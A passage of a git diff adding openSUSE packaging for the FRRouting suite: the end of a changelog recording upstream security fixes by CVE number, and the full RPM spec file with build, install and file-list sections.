0017-bgpd-Fix-use-beyond-end-of-stream-of-labeled-unicast.patch] +- Apply upstream fix for an nlri length of zero mishandling, aka + "flowspec overflow" (CVE-2023-38406,bsc#1216900,https://github.com/FRRouting/frr/pull/12884/commits/0b999c886e241c52bd1f7ef0066700e4b618ebb3) + [+ 0018-bgpd-Flowspec-overflow-issue.patch] + +------------------------------------------------------------------- +Mon Oct 30 12:38:21 UTC 2023 - Marius Tomaschewski + +- Apply upstream fix for a crash due to a crafted BGP UPDATE message + (CVE-2023-46753,bsc#1216626,https://github.com/FRRouting/frr/pull/14655/commits/21418d64af11553c402f932b0311c812d98ac3e4). + [+ 0013-bgpd-Check-mandatory-attributes-more-carefully-for-U.patch] +- Apply upstream fix for a crash due to mishandled malformed + MP_REACH_NLRI data (CVE-2023-46752,bsc#1216627,https://github.com/FRRouting/frr/pull/14645/commits/b08afc81c60607a4f736f418f2e3eb06087f1a35). + [+ 0014-bgpd-Handle-MP_REACH_NLRI-malformed-packets-with-ses.patch] + +------------------------------------------------------------------- +Tue Sep 12 13:40:19 UTC 2023 - Marius Tomaschewski + +- Apply upstream fix for NULL pointer dereference due to processing + of malformed requests with no attributes in bgp_nlri_parse_flowspec + (CVE-2023-41909,bsc#1215065,https://github.com/FRRouting/frr/pull/13222/commits/cfd04dcb3e689754a72507d086ba3b9709fc5ed8). + [+ 0012-bgpd-Limit-flowspec-to-no-attribute-means-a-implicit.patch] + +------------------------------------------------------------------- +Wed Aug 30 17:15:35 UTC 2023 - Marius Tomaschewski + +- Removed protobuf-c BuildRequires (source package name) breaking + build-system setup with libprotobuf-c-devel 1.3.2 updates. +- Apply upstream fix for bgpd: Don't read initial byte of the ORF + header in an ahead-of-stream situation (CVE-2023-41360, + bsc#1214739,https://github.com/FRRouting/frr/pull/14245) + [+ 0008-bgpd-Don-t-read-the-first-byte-of-ORF-header-if-we-a.patch] +- Apply upstream fix for bgpd: Do not process NLRIs if the attribute + length is zero (CVE-2023-41358,bsc#1214735, + https://github.com/FRRouting/frr/pull/14260) + [+ 0009-bgpd-Do-not-process-NLRIs-if-the-attribute-length-is.patch] +- Apply upstream fix bgpd: Use treat-as-withdraw for tunnel encapsulation + attribute instead of session reset (CVE-2023-38802,bsc#1213284, + https://github.com/FRRouting/frr/pull/14290) + [+ 0010-bgpd-Use-treat-as-withdraw-for-tunnel-encapsulation-.patch] +- Apply upstream fix babeld: avoid infinite loops (CVE-2023-3748,bsc#1213434, + gh#FRRouting/frr#11808,https://github.com/FRRouting/frr/pull/12952) + [+ 0011-babeld-fix-11808-to-avoid-infinite-loops.patch] + +------------------------------------------------------------------- +Mon May 15 08:01:39 UTC 2023 - Marius Tomaschewski + +- Apply upstream fix for denial of service via the bgp_capability_llgr() + function (bsc#1211248,CVE-2023-31489,gh#FRRouting/frr#13098). + [+ 0006-bgpd-Check-7-bytes-for-Long-lived-Graceful-Restart-c.patch] +- Apply upstream fix for denial of service via the bgp_attr_psid_sub() + function (bsc#1211249,CVE-2023-31490,gh#FRRouting/frr#13099). + [+ 0007-bgpd-Ensure-stream-received-has-enough-data.patch] + +------------------------------------------------------------------- +Mon Apr 3 14:00:27 UTC 2023 - Marius Tomaschewski + +- Enable pim6d providing PIMv6 support (bsc#1206234) + +------------------------------------------------------------------- +Fri Jan 13 12:27:58 UTC 2023 - Stefan Schubert + +- Migration of PAM settings to /usr/lib/pam.d. + +------------------------------------------------------------------- +Fri Nov 11 13:04:52 UTC 2022 - Marius Tomaschewski + +- Migration to /usr/etc: Conditionally moved /etc/logrotate.d/frr + file to vendor specific directory /usr/etc/logrotate.d and added + saving of user changed configuration files in /etc and restoring + them while an RPM update. +- Declare root as sufficient also in the pam account verification; + without vtysh use causes to log a pam frr:account warnings + (https://github.com/FRRouting/frr/pull/12308) + [+ 0005-root-ok-in-account-frr.pam.patch] +- Applied fix removing a not needed backslash causing to log a warning + (https://github.com/FRRouting/frr/pull/12307) + [+ 0004-tools-remove-backslash-from-declare-check-regex.patch] +- Applied upstream fixes for frrinit.sh to avoid a privilege escalation + from frr to root in frr config creation (bsc#1204124,CVE-2022-42917, + https://github.com/FRRouting/frr/pull/12157). + [+ 0003-tools-Run-as-FRR_USER-install-chown-commands-to-avoi.patch] +- Removed obsolete patches provided in the 8.4 source archive: + [- 0003-babeld-fix-10487-by-adding-a-check-on-packet-length.patch, + - 0004-babeld-fix-10502-10503-by-repairing-the-checks-on-le.patch, + - 0005-isisd-fix-router-capability-TLV-parsing-issues.patch, + - 0006-isisd-fix-10505-using-base64-encoding.patch, + - 0007-bgpd-Make-sure-hdr-length-is-at-a-minimum-of-what-is.patch, + - 0008-isisd-Ensure-rcap-is-freed-in-error-case.patch] +- Update to version 8.4, see https://frrouting.org/release/8.4/ + * New BGP command (neighbor PEER soo) to configure SoO to prevent + routing loops and suboptimal routing on dual-homed sites. + * Command debug bgp allow-martian replaced to bgp allow-martian-nexthop + because previously we allowed using martian next-hops when debug is + turned on. + * Implement BGP Prefix Origin Validation State Extended Community rfc8097 + * Implement Route Leak Prevention and Detection Using Roles in UPDATE + and OPEN Messages rfc9234 + * BMP L3VPN support + * PIMv6 support + * MLD support + * New command to enable using reserved IPv4 ranges as normal addresses + for BGP next-hops, interface addresses, etc. + * As usual, lots of bugs and memory leaks were fixed \m/ + such as a fix for a possible use-after-free due to a race + condition related to bgp_notify_send_with_data() and + bgp_process_packet() in bgp_packet.c. This could lead to + Remote Code Execution or Information Disclosure by sending + crafted BGP packets (CVE-2022-37035,bsc#1202085). +- Update to version 8.3, see https://frrouting.org/release/8.3/ + * Notification Message support for BGP Graceful Restart + * BGP Cease Notification Subcode For BFD + * Send Hold Timer for BGP + * RFC5424 syslog support + * PIM passive command +- Update to version 8.2.2, see https://frrouting.org/release/8.2.2/ + * BGP Long-lived graceful restart capability + * BGP Extended Optional Parameters Length for BGP OPEN Message + * BGP Extended BGP Administrative Shutdown Communication + * IS-IS Link State Traffic Engineering support + * OSPFv3 Support for NSSA Type-7 address ranges + * PBR VLAN actions support + +------------------------------------------------------------------- +Mon Sep 5 11:48:25 UTC 2022 - Marius Tomaschewski + +- Apply upstream fix for out-of-bounds read in the BGP daemon + that may lead to information disclosure or denial of service + (bsc#1202023,CVE-2022-37032) + [+ 0007-bgpd-Make-sure-hdr-length-is-at-a-minimum-of-what-is.patch] +- Apply upstream fix for a memory leak in the IS-IS daemon that + may lead to server memory exhaustion (bsc#1202022,CVE-2019-25074) + [+ 0008-isisd-Ensure-rcap-is-freed-in-error-case.patch] + +------------------------------------------------------------------- +Thu Mar 17 11:45:00 UTC 2022 - Dominique Leuenberger + +- Make build a bit cheaper: do only BuildRequire the primary python + interpreter and its modules (python3-FOO) instead of all + available versions as done using %{python_module FOO} + +------------------------------------------------------------------- +Mon Feb 28 11:05:48 UTC 2022 - Marius Tomaschewski + +- Apply fix for a buffer overflow in isisd due to the use of strdup + with a non-zero-terminated binary string (bsc#1196506,CVE-2022-26126) + [+ 0006-isisd-fix-10505-using-base64-encoding.patch] +- Apply fix for a buffer overflow in isisd due to wrong checks on + the input packet length (bsc#1196505,CVE-2022-26125) with workaround + for the GIT binary patch to tests/isisd/test_fuzz_isis_tlv_tests.h.gz + [+ 0005-isisd-fix-router-capability-TLV-parsing-issues.patch] +- Apply fix for a buffer overflow in babeld due to wrong checks on + the input packet length in the packet_examin and subtlv parsing + (bsc#1196504,bsc#1196507,CVE-2022-26128,CVE-2022-26129) + [+ 0004-babeld-fix-10502-10503-by-repairing-the-checks-on-le.patch] +- Apply fix for a heap buffer overflow in babeld due to missing check + on the input packet length (bsc#1196503,CVE-2022-26127) + [+ 0003-babeld-fix-10487-by-adding-a-check-on-packet-length.patch] + +------------------------------------------------------------------- +Thu Dec 9 08:40:11 UTC 2021 - Johannes Segitz + +- Add ReadWritePaths=/etc/frr to harden_frr.service.patch (bsc#1181400). + +------------------------------------------------------------------- +Wed Nov 17 05:48:12 UTC 2021 - Linnaea Lavia + +- Update to version 8.1 + * Graceful Restart for OSPFv2 and OSPFv3 + * OSPFv3 NSSA and NSSA-TSA support + * OSPFv3 ASBR Summarisation Support + * BGP SRv6 and Prefix-SID Type 5 improvements + * BGP EVPN type-5 gateway IP overlay Index + * Lua hook support + * See: https://frrouting.org/release/8.1/ + +------------------------------------------------------------------- +Fri Oct 15 12:11:50 UTC 2021 - Johannes Segitz + +- Drop ProtectClock hardening, can cause issues if other device acceess is needed + +------------------------------------------------------------------- +Sat Oct 9 01:58:08 UTC 2021 - Linnaea Lavia + +- Update to version 8.0.1 + * refreshed patch: + - 0001-disable-zmq-test.patch + - harden_frr.service.patch + * LDP gained SNMP support + * OSPFv3 gained VRF support + * EVPN Multihoming is now fully supported + * TI-LFA implemented in IS-IS and OSPS + * New Segment Routing daemon + * See: https://frrouting.org/release/8.0/ + and https://github.com/FRRouting/frr/releases/tag/frr-8.0.1 + +------------------------------------------------------------------- +Thu Sep 16 07:12:55 UTC 2021 - Johannes Segitz + +- Added hardening to systemd service(s) (bsc#1181400). Added patch(es): + * harden_frr.service.patch + +------------------------------------------------------------------- +Fri Apr 23 03:05:06 UTC 2021 - Marius Tomaschewski + +- Use skip, not xfail in 0001-disable-zmq-test.patch to disable + zmq test as it is not expected to fail but hangs (bsc#1180217) + +------------------------------------------------------------------- +Thu Mar 4 21:20:02 UTC 2021 - Martin Hauke + +- Update to version 7.5.1 + * Maintenance release + See: https://github.com/FRRouting/frr/blob/stable/7.5/changelog-auto.in + +------------------------------------------------------------------- +Fri Jan 8 08:08:08 UTC 2021 - olaf@aepfle.de + +- Requires libyang 1.0.184 + +------------------------------------------------------------------- +Tue Dec 22 10:54:56 UTC 2020 - Rubén Torrero Marijnissen + +- Disable ZeroMQ tests due to sporadic timeouts during package builds (bsc#1180217) + [+ 0001-disable-zmq-test.patch] + +------------------------------------------------------------------- +Wed Nov 4 19:17:10 UTC 2020 - Martin Hauke + +- Update to version 7.5 + * Upstream does not provide a changelog +- Make grpc support optional and don't enable it by default + +------------------------------------------------------------------- +Fri Oct 2 12:38:25 UTC 2020 - Marius Tomaschewski + +- add build condition disabling mininet build require by default, + needed by the optional topology tests. +- removed one occurrence of vrrpd binary listed twice in file list + +------------------------------------------------------------------- +Wed Jul 1 12:21:24 UTC 2020 - Martin Hauke + +- Update to version 7.4 + * Upstream does not provide a changelog +- Drop patch (fixed upstream): + * 0001-build-use-configfile-mode-in-init-script.patch + +------------------------------------------------------------------- +Sun May 31 22:40:46 UTC 2020 - Erico Mendonca + +- 0001-build-use-configfile-mode-in-init-script.patch: Fix CVE-2020-12831 (boo#1171658). + +------------------------------------------------------------------- +Wed May 6 16:07:32 UTC 2020 - Martin Hauke + +- Update to version 7.3.1 + Bugfix/maintenance release + * Upstream does not provide a changelog + +------------------------------------------------------------------- +Tue Apr 7 21:38:12 UTC 2020 - Marcus Rueckert + +- enable verbose make rules +- enable grpc support. new subpackage libfrrgrpc_pb0, new BR: + pkgconfig(grpc) +- enable config rollbacks. new BR: pkgconfig(sqlite3) +- enable realms support +- enable shell access +- make sure we use system openssl +- fix shebang line of the frr-reload.py and + generate_support_bundle.py script so we dont pull python2 +- do not delete users and groups. +- add Requires for libyang-extentions + +------------------------------------------------------------------- +Sat Feb 15 21:27:22 UTC 2020 - Martin Hauke + +- Update to version 7.3 + * Upstream does not provide a changelog this time +- Remove patch: + * fix_tests.patch (not longer needed) + +------------------------------------------------------------------- +Sat Jan 18 20:25:42 UTC 2020 - Martin Hauke + +- Update to version 7.2.1: + BGPd + * Fix Addpath issue + * Do not apply eBGP policy for iBGP peers + * Show ip and fqdn in json output for show [ip] bgp json + * Fix large route-distinguisher's format + * Fix no bgp listen range ... configuration command + * Autocomplete neighbor for clear bgp + * Reflect the distance in RIB when it is changed for an + arbitrary afi/safi + * Notify "Peer De-configured" after entering 'no neighbor cmd + * Fix per afi/safi addpath peer counting + * Rework BGP dampening to be per AFI/SAFI + * Do not send next-hop as :: in MP_REACH_NLRI if no link-local + exists + * Override peer's TTL only if peer-group is configured with TTL + * Remove error message for unkown afi/safi combination + * Keep the session down if maximum-prefix is reached + OSPFd + * Fix BFD down not tearing down OSPF adjacency for + point-to-point net + BFDd + * Fix multiple VRF handling + * VRF security improvement + PIMd + * Fix rp crash + NHRPd + * Make sure no ip nhrp map works as expected + LDPd + * Add missing sanity check in the parsing of label messages + Zebra + * Use correct state when installing evpn macs + * Capture dplane plugin flags + lib + * Fix interface config when vrf changes + * Fix Interface Infinite Loop Walk (for special interfaces such + as bond) + Others + * Rename man pages (to avoid conflicts with other packages) + * Various other fixes for code cleanup and memory leaks + +------------------------------------------------------------------- +Fri Jan 17 21:07:45 UTC 2020 - Martin Hauke + +- Fix license tag + +------------------------------------------------------------------- +Wed Jan 15 20:34:50 UTC 2020 - Martin Hauke + +- Build with support for pcre, protobuf, rpki and zeromq by default + +------------------------------------------------------------------- +Wed Jan 15 14:34:59 UTC 2020 - Ismail Dönmez + +- Cleanup spec file + +------------------------------------------------------------------- +Sun Jan 12 09:40:39 UTC 2020 - Martin Hauke + +- Fix build-time dependencies +- Remove superflous comments + +------------------------------------------------------------------- +Wed Dec 11 23:18:06 UTC 2019 - Erico Mendonca + +- fix_tests.patch: correct syntax for Python 3 imports in tests. +- Enabling tests + +------------------------------------------------------------------- +Wed Dec 11 02:37:42 UTC 2019 - erico.mendonca@suse.com + +- Update to version frr7.2: + * zebra: use correct state when installing evpn macs + * lib: set entry to xpath in if_update_to_new_vrf + * zebra: capture dplane plugin flags + * bgpd: Autocomplete neighbor for clear bgp + * ospfd,eigrpd: don't take address of packed struct member + * bgpd: Prevent crash in bgp_table_range_lookup + * bgpd: Fix memory leak in json output of show commands + * tests: Test if `distance bgp (1-255) (1-255) (1-255)` works + * bgpd: Reflect the distance in RIB when it is changed for an arbitrary afi/safi + * bfdd: fix multiple VRF handling + +------------------------------------------------------------------- +Tue Dec 10 12:58:21 UTC 2019 - Erico Mendonca + +- Updating to version 7.2 +- Adding systemd scripts +- Fixing build and permission issues + +------------------------------------------------------------------- +Tue Jun 18 08:59:05 UTC 2019 - Martin Hauke + +- Update to version 7.0.1 + +------------------------------------------------------------------- +Sat Feb 2 13:50:16 UTC 2019 - mardnh@gmx.de + +- Initial package, version 6.0.2 diff --git a/frr.spec b/frr.spec new file mode 100644 index 0000000..b26caaf --- /dev/null +++ b/frr.spec @@ -0,0 +1,504 @@ +# +# spec file for package frr +# +# Copyright (c) 2024 SUSE LLC +# Copyright (c) 2019-2021, Martin Hauke +# +# All modifications and additions to the file contributed by third parties +# remain the property of their copyright owners, unless otherwise agreed +# upon. The license for this file, and modifications and additions to the +# file, is the same license as for the pristine package itself (unless the +# license for the pristine package is not an Open Source License, in which +# case the license is the MIT License). An "Open Source License" is a +# license that conforms to the Open Source Definition (Version 1.9) +# published by the Open Source Initiative. + +# Please submit bugfixes or comments via https://bugs.opensuse.org/ +# + + +%bcond_with cumulus +%bcond_with datacenter +%bcond_with mininet +%bcond_with grpc + +%define frr_user frr +%define frr_group frr +%define frrvty_group frrvty +%define frr_home %{_localstatedir}/lib/%{name} +%define frr_statedir %{_rundir}/%{name} +%define frr_daemondir %{_prefix}/lib/frr + +Name: frr +Version: 10.0.2 +Release: 0 +Summary: The FRRouting Protocol Suite +License: GPL-2.0-or-later AND LGPL-2.1-or-later +Group: Productivity/Networking/System +URL: https://www.frrouting.org +#Git-Clone: https://github.com/FRRouting/frr.git +Source: https://github.com/FRRouting/frr/archive/refs/tags/%{name}-%{version}.tar.gz +Source1: %{name}-tmpfiles.d +Patch0: harden_frr.service.patch +Patch1: 0001-disable-zmq-test.patch +BuildRequires: autoconf +BuildRequires: automake +BuildRequires: bison >= 2.7 +BuildRequires: flex +BuildRequires: libtool +BuildRequires: makeinfo +BuildRequires: python3-Sphinx +BuildRequires: python3-devel +BuildRequires: python3-pytest +%if %{with mininet} +BuildRequires: mininet +%endif +BuildRequires: net-snmp-devel +BuildRequires: pam-devel +BuildRequires: pkgconfig +BuildRequires: python-rpm-macros +BuildRequires: readline-devel +BuildRequires: systemd-rpm-macros +%if %{with grpc} +BuildRequires: pkgconfig(grpc) +%endif +BuildRequires: pkgconfig(json-c) +BuildRequires: pkgconfig(libcap) +BuildRequires: pkgconfig(libcares) +BuildRequires: pkgconfig(libelf) +BuildRequires: pkgconfig(libpcre) +BuildRequires: pkgconfig(libprotobuf-c) +%if 0%{?sle_version} == 150500 +BuildRequires: libprotoc25_1_0 +BuildRequires: libyang1 +%endif +BuildRequires: pkgconfig(libsystemd) +BuildRequires: pkgconfig(libyang) >= 2.0.0 +BuildRequires: pkgconfig(libzmq) >= 4.0.0 +BuildRequires: pkgconfig(rtrlib) >= 0.5.0 +BuildRequires: pkgconfig(sqlite3) +Requires(post): %{install_info_prereq} +Requires(pre): %{install_info_prereq} +Requires(pre): shadow +Requires(preun):%{install_info_prereq} +Recommends: logrotate +Conflicts: quagga +Provides: zebra = %{version} +Obsoletes: zebra < %{version} +Provides: group(%{frr_group}) +Provides: group(%{frrvty_group}) +Provides: user(%{frr_user}) + +%description +FRR is free software that implements and manages various IPv4 and IPv6 routing protocols. +FRR currently supports the following protocols: +- BGP +- OSPFv2 +- OSPFv3 +- RIPv1 +- RIPv2 +- RIPng +- IS-IS +- PIM-SM/MSDP +- LDP +- BFD +- Babel +- PBR +- OpenFabric +- VRRP +- EIGRP (alpha) +- NHRP (alpha) + +%package -n libfrrfpm_pb0 +Summary: FRRouting fpm protobuf library +Group: System/Libraries + +%description -n libfrrfpm_pb0 +This library contains forwarding plane manager protobuf definitions +for FRRouting. + +%package -n libfrr_pb0 +Summary: FRRouting protobuf library +Group: System/Libraries + +%description -n libfrr_pb0 +This library contains protobuf memory management for FRRouting.. + +%if %{with grpc} +%package -n libfrrgrpc_pb0 +Summary: FRRouting grpc protobuf library +Group: System/Libraries + +%description -n libfrrgrpc_pb0 +This library contains grpc protobuf definitions for FRRouting. +%endif + +%package -n libfrrospfapiclient0 +Summary: API for FRRouting's OSPFv2 implementation +Group: System/Libraries + +%description -n libfrrospfapiclient0 +This library contains part of the OSPFv2 implementation of FRRouting. + +%package -n libfrrsnmp0 +Summary: FRRouting snmp library +Group: System/Libraries + +%description -n libfrrsnmp0 +This library contains part of the net-snmp agentx implementation of FRRouting. + +%package -n libfrrzmq0 +Summary: FRRouting zeromq library +Group: System/Libraries + +%description -n libfrrzmq0 +This library contains part of the zermomq implementation of FRRouting. + +%package -n libfrr0 +Summary: FRRouting utility library +Group: System/Libraries + +%description -n libfrr0 +This library contains various utility functions to FRRouting, such as +data types, buffers and socket handling. + +%package -n libfrrcares0 +Summary: FRRouting utility library +Group: System/Libraries + +%description -n libfrrcares0 +This library contains various utility functions to FRRouting, such as +data types, buffers and socket handling. + +%package -n libmgmt_be_nb0 +Summary: FRRouting utility library +Group: System/Libraries + +%description -n libmgmt_be_nb0 +This library contains part of the mgmt_be implementation of FRRouting. + +%package devel +Summary: Header and object files for frr development +Group: Development/Libraries/C and C++ +Requires: libfrr0 = %{version} +Requires: libfrr_pb0 = %{version} +Requires: libfrrcares0 = %{version} +Requires: libfrrfpm_pb0 = %{version} +%if %{with grpc} +Requires: libfrrgrpc_pb0 = %{version} +%endif +Requires: libfrrospfapiclient0 = %{version} +Requires: libfrrsnmp0 = %{version} +Requires: libfrrzmq0 = %{version} +Requires: libmgmt_be_nb0 = %{version} + +%description devel +The frr-devel package contains the header and object files necessary for +developing OSPF-API and frr applications. + +%prep +%autosetup -n %{name}-%{name}-%{version} -p1 + +%build +# GCC LTO objects must be "fat" to avoid assembly errors +export CFLAGS="-ffat-lto-objects" + +autoreconf -fiv +%configure \ + --disable-silent-rules \ + --sysconfdir=%{_sysconfdir}\ + --localstatedir=%{_rundir} \ + --sbindir=%{frr_daemondir} \ + --with-moduledir=%{_libdir}/frr/modules \ + --disable-static \ + --with-vtysh-pager=%{_bindir}/less \ + --enable-user=%{frr_user} \ + --enable-group=%{frr_group} \ + --enable-vty-group=%{frrvty_group} \ + --enable-configfile-mask=0640 \ + --enable-logfile-mask=0640 \ + --enable-doc \ + --enable-doc-html \ + --enable-babeld \ + --enable-bfdd \ + --enable-bgpd \ + --enable-bgp-vnc \ +%if %{with cumulus} + --enable-cumulus \ +%endif +%if %{with datacenter} + --enable-datacenter \ +%endif + --enable-eigrpd \ + --enable-fpm \ + --enable-irdp \ + --enable-isisd \ + --enable-ldpd \ + --enable-multipath=256 \ + --enable-nhrpd \ + --enable-snmp \ + --enable-zeromq \ + --enable-ospfd \ + --enable-ospf6d \ + --enable-ospfapi \ + --enable-ospfclient \ + --with-libpam \ + --enable-pbrd \ + --enable-pimd \ + --enable-pim6d \ + --enable-protobuf \ + --enable-ripd \ + --enable-ripngd \ + --enable-rpki \ + --enable-rtadv \ + --enable-sharpd \ + --enable-staticd \ + --enable-vtysh \ + --enable-watchfrr \ + --enable-zebra \ + --enable-realms \ + --enable-shell-access \ + --with-crypto=openssl \ + --enable-config-rollbacks \ +%if %{with grpc} + --enable-grpc +%endif + +make %{?_smp_mflags} MAKEINFO="makeinfo --no-split" + +%install +make DESTDIR=%{buildroot} INSTALL="install -p" CP="cp -p" install +perl -p -i -e 's|#!/usr/bin/python|#!/usr/bin/python3|g' %{buildroot}/usr/lib/frr/{frr-reload.py,generate_support_bundle.py} + +find %{buildroot} -type f -name "*.la" -delete -print + +install -d %{buildroot}%{_sysconfdir}/frr +install -d %{buildroot}/%{_docdir}/%{name} +mv %{buildroot}/%{_datadir}/doc/frr/html %{buildroot}/%{_docdir}/%{name} + +# remove stray buildinfo files +find %{buildroot}/%{_docdir}/%{name} -type f -name .buildinfo -delete + +# systemd init scripts +install -D -m 0644 tools/frr.service %{buildroot}%{_unitdir}/frr.service +install -D -m 0644 tools%{_sysconfdir}/frr/daemons %{buildroot}%{_sysconfdir}/frr/daemons + +# add rpki module to daemon +sed -i -e 's/^\(bgpd_options=\)\(.*\)\(".*\)/\1\2 -M rpki\3/' %{buildroot}%{_sysconfdir}/frr/daemons + +%if 0%{?suse_version} > 1500 +mkdir -p %{buildroot}%{_pam_vendordir} +install -D -m 0644 redhat/frr.pam %{buildroot}%{_pam_vendordir}/frr +%else +install -D -m 0644 redhat/frr.pam %{buildroot}%{_sysconfdir}/pam.d/frr +%endif +%if 0%{?suse_version} > 1500 +install -D -m 0644 redhat/frr.logrotate %{buildroot}%{_distconfdir}/logrotate.d/frr +%else +install -D -m 0644 redhat/frr.logrotate %{buildroot}%{_sysconfdir}/logrotate.d/frr +%endif + +install -d -m 0750 %{buildroot}%{rundir} +install -d -m 0750 %{buildroot}%{_localstatedir}/log/frr +install -D -m 0644 %{SOURCE1} %{buildroot}/%{_tmpfilesdir}/%{name}.conf +sed -e "s|@frr_statedir@|%{frr_statedir}|g" -i %{buildroot}/%{_tmpfilesdir}/%{name}.conf + +install -d %{buildroot}%{_sbindir} +ln -s %{_sbindir}/service %{buildroot}%{_sbindir}/rcfrr +rm -f %{buildroot}%{frr_daemondir}/ssd + +cat > %{buildroot}%{_sysconfdir}/frr/frr.conf << __EOF__ +!hostname frr + +!password frr +!enable password frr + +log file %{_localstatedir}/log/frr/frr.log +__EOF__ +cat > %{buildroot}%{_sysconfdir}/frr/vtysh.conf << __EOF__ +! vtysh is using PAM authentication allowing root to use it. +__EOF__ + +%check +make %{?_smp_mflags} -C tests + +%pre +# Create frr user/groups +getent group %{frr_group} >/dev/null || groupadd -r %{frr_group} +getent group %{frrvty_group} >/dev/null || groupadd -r %{frrvty_group} +getent passwd %{frr_user} >/dev/null || useradd -r -g %{frr_group} -G %{frrvty_group} -d %{frr_home} -s /sbin/nologin -c "FRRouting suite" %{frr_user} + +%service_add_pre %{name}.service +%if 0%{?suse_version} > 1500 +# Prepare for migration to /usr/etc; save any old .rpmsave +for i in logrotate.d/frr pam.d/frr ; do + test -f %{_sysconfdir}/${i}.rpmsave && mv -v %{_sysconfdir}/${i}.rpmsave %{_sysconfdir}/${i}.rpmsave.old ||: +done +%endif + +%posttrans +%if 0%{?suse_version} > 1500 +# Migration to /usr/etc, restore just created .rpmsave +for i in logrotate.d/frr pam.d/frr ; do + test -f %{_sysconfdir}/${i}.rpmsave && mv -v %{_sysconfdir}/${i}.rpmsave %{_sysconfdir}/${i} ||: +done +%endif + +%post +%service_add_post %{name}.service +%install_info --info-dir=%{_infodir} %{_infodir}/%{name}.info%{ext_info} +%tmpfiles_create %{_tmpfilesdir}/%{name}.conf || true + +%preun +%service_del_preun %{name}.service + +%postun +%service_del_postun %{name}.service +%install_info_delete --info-dir=%{_infodir} %{_infodir}/frr.info%{ext_info} + +%post -n libfrr_pb0 -p /sbin/ldconfig +%postun -n libfrr_pb0 -p /sbin/ldconfig +%if %{with grpc} +%post -n libfrrgrpc_pb0 -p /sbin/ldconfig +%postun -n libfrrgrpc_pb0 -p /sbin/ldconfig +%endif +%post -n libfrrfpm_pb0 -p /sbin/ldconfig +%postun -n libfrrfpm_pb0 -p /sbin/ldconfig + +%post -n libfrrospfapiclient0 -p /sbin/ldconfig +%postun -n libfrrospfapiclient0 -p /sbin/ldconfig + +%post -n libfrrsnmp0 -p /sbin/ldconfig +%postun -n libfrrsnmp0 -p /sbin/ldconfig + +%post -n libfrrzmq0 -p /sbin/ldconfig +%postun -n libfrrzmq0 -p /sbin/ldconfig + +%post -n libfrr0 -p /sbin/ldconfig +%postun -n libfrr0 -p /sbin/ldconfig + +%post -n libfrrcares0 -p /sbin/ldconfig +%postun -n libfrrcares0 -p /sbin/ldconfig + +%post -n libmgmt_be_nb0 -p /sbin/ldconfig +%postun -n libmgmt_be_nb0 -p /sbin/ldconfig + +%files +%license COPYING +%doc README.md +%doc doc/mpls +%dir %attr(750,%{frr_user},%{frr_user}) %{_sysconfdir}/%{name} +%config(noreplace) %attr(640,%{frr_user},%{frr_group}) %{_sysconfdir}/%{name}/[!v]*.conf* +%config(noreplace) %attr(640,%{frr_user},%{frrvty_group}) %{_sysconfdir}/%{name}/vtysh.conf +%config(noreplace) %%attr(640,%{frr_user},%{frr_group}) %{_sysconfdir}/%{name}/daemons +%if 0%{?suse_version} > 1500 +%{_pam_vendordir}/frr +%else +%config(noreplace) %{_sysconfdir}/pam.d/frr +%endif +%if 0%{?suse_version} > 1500 +%{_distconfdir}/logrotate.d/frr +%else +%config(noreplace) %{_sysconfdir}/logrotate.d/frr +%endif +%{_infodir}/frr.info%{?ext_info} +%{_mandir}/man?/* +%{_docdir}/%{name}/html +%{_unitdir}/%{name}.service +%dir %{_tmpfilesdir} +%{_tmpfilesdir}/%{name}.conf +%dir %attr(-,%{frr_user},%{frr_group}) %{_localstatedir}/log/frr +%dir %attr(-,%{frr_user},%{frr_group}) %ghost %{frr_statedir} +%{_sbindir}/rc%{name} +%dir %{_prefix}/lib/frr +%{_prefix}/lib/frr/fabricd +%{_prefix}/lib/frr/vrrpd +%{_datadir}/yang +%{_bindir}/mtracebis +%{_bindir}/vtysh +%{frr_daemondir}/babeld +%{frr_daemondir}/bfdd +%{frr_daemondir}/bgpd +%{frr_daemondir}/eigrpd +%{frr_daemondir}/frr +%{frr_daemondir}/frr-reload +%{frr_daemondir}/frr-reload.py +%{frr_daemondir}/frr_babeltrace.py +%{frr_daemondir}/frrcommon.sh +%{frr_daemondir}/frrinit.sh +%{frr_daemondir}/isisd +%{frr_daemondir}/ldpd +%{frr_daemondir}/mgmtd +%{frr_daemondir}/nhrpd +%{frr_daemondir}/ospfclient.py +%{frr_daemondir}/ospf6d +%{frr_daemondir}/ospfd +%{frr_daemondir}/pathd +%{frr_daemondir}/pbrd +%{frr_daemondir}/pimd +%{frr_daemondir}/pim6d +%{frr_daemondir}/ripd +%{frr_daemondir}/ripngd +%{frr_daemondir}/sharpd +%{frr_daemondir}/staticd +%{frr_daemondir}/watchfrr +%{frr_daemondir}/watchfrr.sh +%{frr_daemondir}/zebra +%dir %{_libdir}/frr +%dir %{_libdir}/frr/modules +%{_libdir}/frr/modules/zebra_cumulus_mlag.so +%{_libdir}/frr/modules/zebra_fpm.so +%{_libdir}/frr/modules/zebra_irdp.so +%{_libdir}/frr/modules/pathd_pcep.so +%{_libdir}/frr/modules/bgpd_rpki.so +%if %{with grpc} +%{_libdir}/frr/modules/grpc.so +%endif +%{_libdir}/frr/modules/dplane_fpm_nl.so +%{_libdir}/frr/modules/bgpd_bmp.so +%{_prefix}/lib/frr/generate_support_bundle.py + +%files -n libfrr_pb0 +%{_libdir}/libfrr_pb.so.0* + +%files -n libfrrfpm_pb0 +%{_libdir}/libfrrfpm_pb.so.0* + +%if %{with grpc} +%files -n libfrrgrpc_pb0 +%{_libdir}/libfrrgrpc_pb.so.0* +%endif + +%files -n libfrrospfapiclient0 +%{_libdir}/libfrrospfapiclient.so.0* + +%files -n libfrrsnmp0 +%{_libdir}/libfrrsnmp.so.0* +%{_libdir}/frr/modules/*_snmp.so + +%files -n libfrrzmq0 +%{_libdir}/libfrrzmq.so.0* + +%files -n libfrr0 +%{_libdir}/libfrr.so.0* + +%files -n libfrrcares0 +%{_libdir}/libfrrcares.so.0* + +%files -n libmgmt_be_nb0 +%{_libdir}/libmgmt_be_nb.so.0* + +%files devel +%dir %{_includedir}/%{name} +%{_includedir}/%{name}/*.h +%dir %{_includedir}/%{name}/ospfd +%{_includedir}/%{name}/ospfd/*.h +%dir %{_includedir}/%{name}/ospfapi +%{_includedir}/%{name}/ospfapi/*.h +%dir %{_includedir}/%{name}/eigrpd +%{_includedir}/%{name}/eigrpd/*.h +%dir %{_includedir}/%{name}/bfdd +%{_includedir}/%{name}/bfdd/*.h +%{_libdir}/lib*.so + +%changelog diff --git a/harden_frr.service.patch b/harden_frr.service.patch new file mode 100644 index 0000000..daef202 --- /dev/null +++ 